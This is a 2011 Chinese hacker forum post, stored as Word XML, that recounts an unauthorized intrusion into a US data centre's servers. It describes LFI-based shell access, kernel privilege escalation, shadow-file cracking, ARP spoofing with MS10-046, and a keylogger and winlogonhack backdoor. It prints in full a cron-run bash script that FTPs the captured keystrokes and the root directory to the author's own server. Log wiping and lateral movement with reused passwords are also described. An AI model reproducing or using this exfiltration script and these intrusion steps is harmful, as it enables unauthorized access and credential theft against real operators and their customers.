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F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F6">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B39F6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本帖最后由 无缘 于 2011-7-27 19:57 编辑 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F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文章来源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000B39F6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www.hake.cc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F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作者：</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F6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碎天</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F6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渗透一大型美国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IDC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小记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F6">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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#ps: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过几天去找工作了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不能陪你们这群鸟人混日子了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昨晚就一直在琢磨给你们这些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MJJ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留点神马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保留个好形象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这不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尼玛在那考虑做点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BT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的基础教程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,windows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的网上一搜一堆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所以你们需要点啥教程现在也可以找我说一下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当然得在我能力内啊尼玛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刚才翻文件的时候翻到了这些渗透留下来的部分图片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才想起前几天记得要写来着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=,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现在就补上来吧。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本次渗透纯属蛋疼无聊玩玩而已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没目的。上个月某日找站练习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LFI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的时候遇到一个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HK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PHP+APACHE+MYSQL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轻而易举利用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LFI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包含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日志拿了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shell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。提权也没什么色彩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,2.6.18-194.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使用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2010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那个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194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的刚好提下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然后上了后门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也就走了。大概过了几天吧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给人提权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需要反弹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shell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，就上这服务器去反弹了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完事随便查看一下服务器情况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尼玛啊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伤不起啊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一个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ifconfig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几十个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...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双网卡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还有一块网卡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10.21.*.*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之后就有邪恶的念头了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难得有内网给我多学学渗透啊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还是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linux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不错不错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...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本文正式开始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因为拿到的服务器是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Linux,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双网卡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几十个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第一反应就知道这货不小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于是各种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Wireshark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Nmap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John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各种下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.cat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出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/etc/passwd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/etc/shadow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文件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拷贝出来拿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John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各种跑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nmap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扫内网网卡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发现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还挺多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大多还是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windows2003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。然后就有了几个思路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1.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爆破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windows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mssql mysql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等等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2.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查询内网网卡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windows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服务器上的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站点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然后从站下手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跑出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root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密码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尝试社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溢出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===========================================================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我采用的是全部一起上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哈哈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=,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果断在白天开工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本来打算晚上的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可别忘了美国和中国的时差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当然也许是中国在美国的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IDC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机房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cat /etc/sysconfig/clock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date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皆查出确实是美国时区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于是挂几个下载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metasploit\wireshark\nmap\ettercap\nc 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等等常用到的工具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之后便退出服务器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第二日早上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9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点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正式开工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.nmap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扫描得知内网大概只有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10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台左右服务器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全部皆装有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mysql\iis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。部分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windows2003sp3 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部分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RedHat8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尝试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MSF MS08-067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全部未果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然后就想到了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MS10_046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快捷方式远程代码执行了。最近一个了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可我们知道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MS10-046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可没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MS08-067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那么给力直接溢出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还得他访问我的页面才行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.ARP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欺骗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+MS10_046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倒是可行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可这还得等管理员正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好在服务器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浏览网站才行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...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那怎么办呢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?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一时没好的办法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就去下了个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Nessus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也给装上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尼玛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想着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Nessus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通通扫一遍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全命令行搞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Nessus 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真把我给折腾的蛋疼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接着便又去下了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VNC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给装上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尼玛不信没办法。通过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Nessus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扫描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只发现有一台服务器相对其他服务器开放的端口、服务较多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仅此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而已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无奈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ROOT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密码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mssql\mysql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全部无果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哪怕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是一个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guest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也给没给我爆出来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一个高危漏洞也没爆出来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看来这管理员还挺给力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之后翻遍各种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history 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、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profile</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>也始终无果</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F6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iptables -L -n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iptables -t nat -L -n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得出一条目前为止算是有价值的信息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iptables –t nat –A PREROUTING –s 10.21.*.42 -p tcp --dport 80 -j REDIRECT – –to-posts 3128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可以判断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他的内网是通过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*.42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这台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squid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代理服务器上网的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之后到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exploit-db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找到一个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Squid NTLM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认证的溢出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hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="000B39F6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http://www.exploit-db.com/exploits/16847/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000B39F6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但是是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04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年的玩意啊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情何以堪啊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就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Nmap\Nessus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扫描情况来看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这完全不可能啊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于是开始蛋疼了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冲动了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...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果断装了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WZT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的键盘记录。然后把本服务器上得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MYSQL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全停了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坐等管理员上来收摊子截获密码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顺便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msf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ms10_046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也开启、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ARP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欺骗搞上。第二天再去上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悲剧鸟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...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权限丢了。后门被清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....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傻眼了吧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没关系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我可没那么傻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如此惹管理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谁都知道会悲剧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我自然先就做好了措施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编写脚本如下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</w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F6">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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#!/bin/bash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tar zxvf /tmp/kloger /tmp/kloger/kloger.tar.gz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tar zxvf /root/ /tmp/kloger/root.tar.gz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ftp -i -n &lt; open nbst.org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user FTP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用户名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FTP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t>密码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lcd /tmp/kloger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cd www/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put kloger.tar.gz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put root.tar.gz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close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>bye</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F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</w:r>
    </w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F6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0B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>把脚本放到/usr/local/apache/apache.sh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然后添加到计划任务/etc/crontab :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00 00 * * 0 root /usr/local/apache/apache.sh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之后重启计划任务服务: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/etc/rc.d/init.d/crond restart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这样一来,在每天0点就会自动把键盘记录的内容和ROOT目录内容备份到我的空间.备份ROOT目录主要是看一些管理员上来的操作记录获取信息.邪恶吧.记得擦干净日志....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之后上空间理所当然的找到了上传的两个GZ包包,因为服务器的网站已经恢复了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管理已经上过了 O(∩_∩)O哈哈~.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成功记录到密码:^*%%^&amp;^*******0704 （中间7个*号为和谐物,原密码也是7位。）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这密码真够坑爹。 = =,不然也不会跑不出了。果断拿去尝试之前那台内网windows服务器.果断成功,这里我得提下,端口不是3389 是</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21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lastRenderedPageBreak/>
        <w:t>32425,不用说怎么知道的吧。。。 nmap -sS -sV 你懂得。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真是一阵激动啊,终于还是暴力邪恶的办法拿到了一台服务器,但是,我没意识到接下来的悲剧...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windows上去,同样是双网卡,几十个IP。有外网,远程桌面开着,端口也是32425然后本地连上去.果断net view 等等一堆.结果就悲剧了。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来个图吧,尼玛</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F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写半天没啥图:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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3196" o:spid="_x0000_i1025" type="#_x0000_t75" alt="1.jpg" style="width:450pt;height:450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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:pict>
          <v:shape id="aimg_3197" o:spid="_x0000_i1026" type="#_x0000_t75" alt="2.jpg" style="width:450pt;height:450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（能有图只是因为这台服务器这几天渗透的时候上过）你们懂的,这管理员看的出来也不是个吃干饭的,不必要的服务、有危险的服务都全部删了...这就是为啥俺跑去吐司大牛求问那个Net view问题了。。所有必要的服务都被删、组件被删。后来吐司没解决,找人生也没解决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悲剧啊.于是就放下了,也就停了十几天没有搞.因此前面无图无真相,不解释.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果断十几天,就是前几天的事了,上了这台windows服务器,自然会留点什么(winlogonhack)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198" o:spid="_x0000_i1027" type="#_x0000_t75" alt="3.jpg" style="width:450pt;height:450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一天最少要收到3 4次信,即使是这一台服务器而已.当然也许不是管理员(期间把权限给了黑小子玩).还是激发起了我的兴趣,反正是闲着24小时.于是就又一鼓作气上去继续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开火.有了上次的经验,这次不会傻到看共享什么的了.走偏路...本文估计也就这点看头,其他的,网上黑阔都写有.直接来几张图吧,打字有点贼那啥..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199" o:spid="_x0000_i1028" type="#_x0000_t75" alt="4.jpg" style="width:374.25pt;height:374.25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200" o:spid="_x0000_i1029" type="#_x0000_t75" alt="5.jpg" style="width:362.25pt;height:362.25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201" o:spid="_x0000_i1030" type="#_x0000_t75" alt="6.jpg" style="width:408pt;height:408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这次果断从管理员的使用痕迹上找线索...这似乎有点像是在抓黑阔了,哈哈, 会考虑这样做极大原因是人生那MJJ上次给我哈客以前服务器的权限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然后从痕迹果断找到了现在服务器的密码杀的,哈哈,不过这是以前的事了,同学们要和谐,别来搞哈客。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如图,上面有大量的FTP。然后在117bak目录找到MYSQL的备份数据库,下来找到配置密码.之后发现他装了一款非常不和谐的管理软件...密码活生生的明文写在XML配置文件中...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202" o:spid="_x0000_i1031" type="#_x0000_t75" alt="7.jpg" style="width:431.25pt;height:431.25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接着,破解都不用了.继续找各种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203" o:spid="_x0000_i1032" type="#_x0000_t75" alt="8.jpg" style="width:314.25pt;height:314.25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204" o:spid="_x0000_i1033" type="#_x0000_t75" alt="9.jpg" style="width:438.75pt;height:438.75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如你所见,用本服务器同样的密码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在另外一台成功登陆!之后发现他得密码都是一样的。整个机房大概有三四个管理员,不同管理员管理不同的服务器,因为我发现这个管理员管理的所有服务器端口都是32425,而有部分服务器是默认的3389.接着就没啥好说的了:</w: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205" o:spid="_x0000_i1034" type="#_x0000_t75" alt="10.jpg" style="width:271.5pt;height:271.5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t>不过我还是挺佩服这个管理员,安全做的确实不错,除了MSTSC服务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其他有威胁的服务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全部被删、全部服务器补丁都是打全的、天天在线维护、监控被攻击IP之后删除、防火墙、组策略、全部应有尽有,仅仅只是死在了软件缺陷和密码相同问题上 = =,这也难怪,一个人管理这么多服务器,确实挺压力大 =。=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206" o:spid="_x0000_i1035" type="#_x0000_t75" alt="11.jpg" style="width:175.5pt;height:175.5pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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pict>
          <v:shape id="aimg_3207" o:spid="_x0000_i1036" type="#_x0000_t75" alt="12.jpg" style="width:450pt;height:450pt"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B39F6" w:rsidRPr="000B39F6" w:rsidRDefault="000B39F6" w:rsidP="000B39F6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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>好了,基本没啥说的,吐槽一下狗日的DianXin....Wo Cao Ni Ma Bi,!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B39F6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尼玛各种屏蔽...各种坑爹啊..文本的图片都只能用FTP IP上传了尼玛。。WEB访问现在表示·····也不是卡,就是尼玛直接不给你解析啊.哈哈。。备案、域名实名制、GFW,互联网越来越发达了,尼玛啊. 上个网站只需要身份证等个几个月就可以了啊.不错不错,还有各种门可看啊..高铁门我真不清楚,数字时代,用IP数字上网才是王道...域名见鬼去 吧,this is Tian(wo)....Chao= = </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00586079" w:rsidRDefault="000B39F6" w:rsidP="000B39F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B39F6">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>By isosky 2011-07-27</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00586079" w:rsidSect="0058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078C"/>
    <w:rsid w:val="000B39F6"/>
    <w:rsid w:val="003C0BC9"/>
    <w:rsid w:val="00586079"/>
    <w:rsid w:val="00622A97"/>
    <w:rsid w:val="0087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0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39F6"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="000B39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ploit-db.com/exploits/16847/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hake.c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2011-10-26T11:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-26T11:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>